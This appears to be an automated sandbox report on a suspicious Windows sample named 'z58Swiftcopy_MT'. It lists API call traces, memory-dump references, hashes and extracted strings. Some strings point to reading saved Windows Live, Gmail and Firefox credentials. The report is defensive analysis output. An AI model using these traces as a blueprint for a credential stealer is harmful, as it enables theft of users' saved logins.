                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2485852401-0
                                                                                                                                                                                                                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405C3B
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                                      • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                      • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2126104762-0
                                                                                                                                                                                                                                      • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                      • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                                      • String ID: user_pref("
                                                                                                                                                                                                                                      • API String ID: 765841271-2487180061
                                                                                                                                                                                                                                      • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                      • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                                      • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7693E430,?), ref: 004081B9
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
